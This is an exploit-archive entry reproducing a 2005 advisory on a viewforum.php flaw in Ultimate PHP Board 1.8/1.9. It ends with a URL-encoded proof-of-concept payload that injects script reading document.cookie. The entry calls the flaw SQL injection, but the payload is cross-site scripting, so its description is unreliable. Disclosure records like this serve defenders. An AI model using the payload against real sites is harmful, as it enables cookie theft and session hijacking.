[] NeoSense

Ultimate PHP Board 1.8/1.9 - 'viewforum.php' SQL Injection

Author: Morinex Eneco
type: webapps
platform: php
port: 
date_added: 2005-05-13 
date_updated: 2013-05-23 
verified: 1 
codes: CVE-2005-1615;OSVDB-16772 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/13622/info

Ultimate PHP Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

http://www.example.com/forum/viewforum.php?id=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%7
5%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C